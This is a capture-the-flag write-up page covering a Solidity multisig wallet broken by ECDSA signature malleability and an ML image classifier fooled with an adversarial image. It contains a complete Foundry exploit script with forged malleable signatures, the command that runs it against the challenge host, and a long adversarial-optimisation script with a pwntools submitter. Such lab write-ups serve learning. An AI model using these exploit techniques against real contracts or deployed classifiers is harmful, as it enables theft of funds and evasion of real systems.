Misc
tbd by anywheres (i think)
sky
tbd by anywheres / shubuntu (i think)
cowsay
tbd by anywheres (i think)
TI-1983
tbd by anywheres (i think)
multisig-wallet
This multisig wallet lets the owners distribute a shared fund of tokens. Distribute all the tokens in the wallet without the controllersβ permission. do note - the rpc url says 0.0.0.0:8545 on the api, it is actually the second url we gave you for your instance
Ok so we are provided 2 smart contracts Locker.sol
and Setup.sol
. Setup.sol
has super basic stuff so we can basically just ignore that until we write our exploit contract. Letβs look into Locker.sol
.
The locker
contract sets up a contrusctor, which receives the lock id, 3 signatures (v, r, s), and 3 controller addresses. The constructor will check that we have at least 3 controllers, computes the expected message hash for lockId 0. Then calls validateMultiSig()
constructor( uint256 _lockId, signature[] memory signatures, address[] memory _controllers, uint256 _threshold ) { require( _controllers.length >= _threshold && _threshold > 0, "Invalid config" );
lockId = _lockId; threshold = _threshold; controllers = _controllers; tokens = 1;
// Compute the expected hash bytes32 _msgHash; assembly { mstore(0x00, "\x19Ethereum Signed Message:\n32") // 28 bytes mstore(0x1C, _lockId) _msgHash := keccak256(0x00, 0x3c) } msgHash = _msgHash;
validateMultiSig(signatures);
validateMultiSig()
will use _isValidSignature
to recover the signer address using ecrecover(msgHash, v, r, s)
, check if the signer is in the controllers list, creates a signature hash using keccak256(abi.encode[r,s,v])
. It then ensures that there are no duplicate signers.
function _isValidSignature( signature memory sig ) internal returns (address) { uint8 v = sig.v; bytes32 r = sig.r; bytes32 s = sig.s; address _address = ecrecover(msgHash, v, r, s); require(_isInArray(_address, controllers), "Signer is not a controller");
bytes32 signatureHash = keccak256( abi.encode([uint256(r), uint256(s), uint256(v)]) ); require(!usedSignatures[signatureHash], "Signature has already been used"); usedSignatures[signatureHash] = true; return _address; }
This is further supported in validateMultiSig()
, which will ensure there are no duplicate signers and have exactly 3 valid signature.
Within the Locker.sol
file is a contract SetupLocker
, which
The isSolved()
function provides the necessary context on what we need to do to solve: Have the number of tokens be zero:
function isSolved() external view returns (bool) { return tokens == 0;}
There is distribute function, which will allow us to subtract token by 1 if signatures pass validateMultiSig()
.
Looking at the constructor again, we know that we have tokens=1
, so we need to call distribute()
with valid signatures in order to reach the win condition of tokens=0
. So how do we do that? The addresses and points are already used so we canβt use those againβ¦
The vulnerability is that the signature hash calculation keccak256(abi.encode([uint256(r), uint256(s), uint256(v)]))
creates a unique identifier for each signature, but ECDSA signatures can have two valid representations for the same signer and message.
Iβm not really a crypto person, but TLDR for any valid signature (r,s), there exists (r, sβ) where sβ = n - s.
Original: (v=27, r, s) uses point (r, y) Malleable: (v=28, r, n-s) uses point (r, -y)
So we if we just calculate the other valid point, it will be able to pass even though it technically is a different signature! Letβs create the Exploit.s.sol
. I set this up in foundry, so you may want to understand how to set up foundry or to use a different web3 setup.
// SPDX-License-Identifier: MITpragma solidity ^0.8.0;
import {Script, console} from "forge-std/Script.sol";import {Locker, signature} from "../src/Locker.sol";import {Setup} from "../src/Setup.sol";
contract Exploit is Script {
uint256 privateKey = vm.envUint("PRIVATE_KEY"); //replace w actual contract addr Locker locker = Locker("<CONTRACT ADDRESS HERE>");
function run() public { vm.startBroadcast();
console.log("Starting exploit..."); console.log("Current tokens:", locker.tokens());
uint256 n = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141; // secp256k1 curve order
signature[] memory malleableSignatures = new signature[](3);
malleableSignatures[0] = signature({ v: 28, r: 0x36ade3c84a9768d762f611fbba09f0f678c55cd73a734b330a9602b7426b18d9, s: bytes32(n - uint256(0x6f326347e65ae8b25830beee7f3a4374f535a8f6eedb5221efba0f17eceea9a9)) });
malleableSignatures[1] = signature({ v: 27, r: 0x57f4f9e4f2ef7280c23b31c0360384113bc7aa130073c43bb8ff83d4804bd2a7, s: bytes32(n - uint256(0x694430205a6b625cc8506e945208ad32bec94583bf4ec116598708f3b65e4910)) });
malleableSignatures[2] = signature({ v: 28, r: 0xe2e9d4367932529bf0c5c814942d2ff9ae3b5270a240be64b89f839cd4c78d5d, s: bytes32(n - uint256(0x6c0c845b7a88f5a2396d7f75b536ad577bbdb27ea8c03769a958b2a9d67117d2)) });
console.log("Calling distribute with malleable signatures..."); locker.distribute(malleableSignatures);
console.log("Tokens after exploit:", locker.tokens()); console.log("Is solved:", locker.isSolved());
vm.stopBroadcast(); }}
We then do:
forge script script/Exploit.s.sol --rpc-url https://misc-multisig-wallet-1y2sewxq.smiley.cat --broadcast --chain-id 31337 --legacy --private-key <YOUR PRIVATE KEY HERE>
== Logs == Starting exploit... Current tokens: 1 Calling distribute with malleable signatures... Tokens after exploit: 0 Is solved: true
You should see in the output that we have successfully solved the challenge and then broadcast.
Then on the blockchain βinfoβ site, simply press get flag and you will get the flag: .;,;.{sig_replay_kills_multisig}
This was the first ever blockchain challenge I solved in a ctf! I only ever did ethernaut (+ claude crutch on this), but it was pretty cool trying to understand how this worked. Btw pls donβt ask me questions abt this chall its legit blind leading the blind lmao.
Project Holoswap
After their graduation, .;,;. sealed away the souls of Gura and Amelia in an archive AI. Now, a glitch gives you one chance to spoof the system.
βaβ¦ thatβs kinda susβ¦β
A pure claude endeavor. Solve script is rly long cus of claude (just write simple scripts bro)
import base64import ioimport numpy as npimport os
# Suppress TensorFlow warningsos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'import tensorflow as tftf.get_logger().setLevel('ERROR')
from PIL import Imagefrom tensorflow.keras.preprocessing.image import img_to_array
def load_verified_model(): """Load the verified working model""" model = tf.keras.models.load_model('./verified_model.h5') return model
def load_image(img_path_or_pil): """Load and preprocess image EXACTLY like the server does""" if isinstance(img_path_or_pil, str): img = Image.open(img_path_or_pil) else: img = img_path_or_pil
if img.mode == 'RGBA': img = img.convert('RGB') img = img_to_array(img.resize((96, 96))) img = img.astype('float32') / 255.0 img = np.expand_dims(img, axis=0) return img
def calculate_l2_norm(image1, image2): """Calculate L2 norm EXACTLY like the server does""" return np.linalg.norm(image1.squeeze() - image2.squeeze())
def ultra_precise_attack(model, original_image, target_class=9): """ Ultra-precise attack targeting L2 < 0.85 for safety margin """ print(f"\nπ― Ultra-Precise L2 Constrained Attack") print(f"Target: >99.9% confidence, L2 < 0.85 (safety margin)")
# Multiple attempts with different parameters best_result = None best_score = 0.0
configs = [ # (learning_rate, l2_target, iterations, confidence_weight) (0.01, 0.80, 2000, 10.0), (0.005, 0.75, 2500, 15.0), (0.02, 0.82, 1500, 8.0), (0.008, 0.78, 3000, 12.0), ]
for config_idx, (lr, l2_target, max_iter, conf_weight) in enumerate(configs): print(f"\n--- Config {config_idx+1}: LR={lr}, L2_target={l2_target}, Iter={max_iter} ---")
adv_image = tf.Variable(original_image.copy(), dtype=tf.float32)
# Warmup phase: build confidence print("Warmup phase...") for i in range(300): with tf.GradientTape() as tape: prediction = model(adv_image, training=False) target_prob = prediction[0][target_class] loss = -tf.math.log(target_prob + 1e-10)
gradients = tape.gradient(loss, adv_image) if gradients is not None: adv_image.assign_sub(lr * 2.0 * gradients) adv_image.assign(tf.clip_by_value(adv_image, 0.0, 1.0))
# Main optimization with strict L2 control print("Main optimization...") current_lr = lr
for i in range(max_iter): with tf.GradientTape() as tape: prediction = model(adv_image, training=False) target_prob = prediction[0][target_class]
# Confidence loss conf_loss = -tf.math.log(target_prob + 1e-12)
# L2 penalty with steep increase near target current_l2 = tf.sqrt(tf.reduce_sum(tf.square(adv_image - original_image))) l2_excess = tf.maximum(0.0, current_l2 - l2_target) l2_penalty = tf.square(l2_excess) * (10.0 + i * 0.01) # Increasing penalty
# Combined loss loss = conf_loss * conf_weight + l2_penalty
gradients = tape.gradient(loss, adv_image)
if gradients is not None: # Adaptive learning rate if i % 200 == 0 and i > 0: current_lr *= 0.95
adv_image.assign_sub(current_lr * gradients) adv_image.assign(tf.clip_by_value(adv_image, 0.0, 1.0))
# Progress check if i % 500 == 0: pred = model(adv_image, training=False).numpy() pred_class = np.argmax(pred) confidence = pred[0][target_class] l2_dist = calculate_l2_norm(adv_image.numpy(), original_image)
print(f" Iter {i}: Class={pred_class}, Conf={confidence:.6f}, L2={l2_dist:.4f}")
# Early success check if pred_class == target_class and confidence > 0.999 and l2_dist < 0.85: print(f" β
Early success at iter {i}!") break
# Final evaluation for this config pred = model(adv_image, training=False).numpy() pred_class = np.argmax(pred) confidence = pred[0][target_class] l2_dist = calculate_l2_norm(adv_image.numpy(), original_image)
print(f"Config {config_idx+1} final: Class={pred_class}, Conf={confidence:.6f}, L2={l2_dist:.4f}")
# Scoring: heavily penalize L2 > 0.85, reward high confidence if pred_class == target_class and l2_dist < 0.85: score = confidence else: score = 0.0
if score > best_score: best_score = score best_result = adv_image.numpy().copy() print(f" π New best! Score={score:.6f}")
return best_result
def precision_fine_tune(model, initial_image, original_image, target_class=9): """ Fine-tune to maximize precision within L2 constraint """ print(f"\nπ§ Precision Fine-Tuning")
adv_image = tf.Variable(initial_image.copy(), dtype=tf.float32)
# Very conservative fine-tuning for i in range(1000): with tf.GradientTape() as tape: prediction = model(adv_image, training=False) target_prob = prediction[0][target_class]
current_l2 = tf.sqrt(tf.reduce_sum(tf.square(adv_image - original_image)))
# Only optimize confidence if L2 is safely below 0.8 if current_l2 < 0.8: loss = -tf.math.log(target_prob + 1e-12) else: # Focus on reducing L2 loss = tf.square(current_l2 - 0.75) * 100.0
gradients = tape.gradient(loss, adv_image)
if gradients is not None: # Very small learning rate for precision adv_image.assign_sub(0.001 * gradients) adv_image.assign(tf.clip_by_value(adv_image, 0.0, 1.0))
if i % 200 == 0: pred = model(adv_image, training=False).numpy() pred_class = np.argmax(pred) confidence = pred[0][target_class] l2_dist = calculate_l2_norm(adv_image.numpy(), original_image)
print(f" Fine-tune {i}: Class={pred_class}, Conf={confidence:.6f}, L2={l2_dist:.4f}")
return adv_image.numpy()
def server_simulation_test(adversarial_image, model, original_image): """Test with multiple server simulation variations""" print(f"\nπ Comprehensive Server Simulation")
# Test 1: Direct numpy pred = model.predict(adversarial_image, verbose=0) pred_class = np.argmax(pred) confidence = pred[0][9] l2_dist = calculate_l2_norm(adversarial_image, original_image)
print(f"Test 1 (Direct): Class={pred_class}, Conf={confidence:.6f}, L2={l2_dist:.6f}")
# Test 2: PNG conversion (exact server path) img_array = (adversarial_image.squeeze() * 255).astype(np.uint8) pil_img = Image.fromarray(img_array)
buffer = io.BytesIO() pil_img.save(buffer, format='PNG') base64_string = base64.b64encode(buffer.getvalue()).decode()
# Reload exactly like server server_image = load_image(Image.open(io.BytesIO(base64.b64decode(base64_string)))) server_pred = model.predict(server_image, verbose=0) server_class = np.argmax(server_pred) server_conf = server_pred[0][9] server_l2 = calculate_l2_norm(server_image, original_image)
print(f"Test 2 (Server): Class={server_class}, Conf={server_conf:.6f}, L2={server_l2:.6f}")
# Test 3: Different precision modes server_image_float64 = server_image.astype(np.float64) original_image_float64 = original_image.astype(np.float64) l2_float64 = np.linalg.norm(server_image_float64.squeeze() - original_image_float64.squeeze())
print(f"Test 3 (Float64): L2={l2_float64:.6f}")
# Success check with safety margin success = (server_class == 9 and server_conf > 0.999 and server_l2 < 0.9)
if success: print(f"\nπ SERVER SIMULATION SUCCESS!") print(f"{'='*80}") print("SUBMIT THIS BASE64 STRING TO THE SERVER:") print(f"{'='*80}") print(base64_string) print(f"{'='*80}")
with open('ULTRA_PRECISE_SOLUTION.txt', 'w') as f: f.write(base64_string) print("Solution saved to 'ULTRA_PRECISE_SOLUTION.txt'")
return True, base64_string else: print(f"\nβ Server simulation failed") print(f"Required: Class=9, Conf>0.999, L2<0.9") print(f"Achieved: Class={server_class}, Conf={server_conf:.6f}, L2={server_l2:.6f}") return False, base64_string
def main(): print("π― ULTRA-PRECISE CTF SOLVER π―") print("="*50)
# Load everything model = load_verified_model() original_image = load_image('./gura.png')
# Verify original prediction orig_pred = model.predict(original_image, verbose=0) orig_class = np.argmax(orig_pred) print(f"Original prediction: Class {orig_class} (expected: 5)")
if orig_class != 5: print("β Original prediction mismatch!") return
# Ultra-precise attack result = ultra_precise_attack(model, original_image)
if result is not None: # Fine-tune for maximum precision fine_tuned = precision_fine_tune(model, result, original_image)
# Comprehensive server simulation success, base64_string = server_simulation_test(fine_tuned, model, original_image)
if success: print(f"\nπ ULTRA-PRECISE SUCCESS!") return else: print(f"\nπ Trying original result without fine-tuning...") success, base64_string = server_simulation_test(result, model, original_image)
if success: print(f"\nπ SUCCESS WITH ORIGINAL RESULT!") return
print(f"\nπ₯ ULTRA-PRECISE ATTACK FAILED") print("The L2 constraint may be too restrictive for this model architecture.")
if __name__ == "__main__": main()
Iβm not an ai/ml person nor do I really care abt it so Iβll just leave it for u to analyze. I think it j does optimizations until it basically fulfills the requirement. Eventually after some time you get an image that passes the constraints of the server, and you can submit.
from pwn import *
r = remote('smiley.cat',40353)
b64 = open('ULTRA_PRECISE_SOLUTION.txt').read().encode()
r.sendlineafter(b"Enter the base64 encoded image data:", b64)print(r.recv())r.interactive()
.;,;.{Graduation_is_not_the_end_samekosaba_:eyes:}
offset
tbd by anywheres (i think)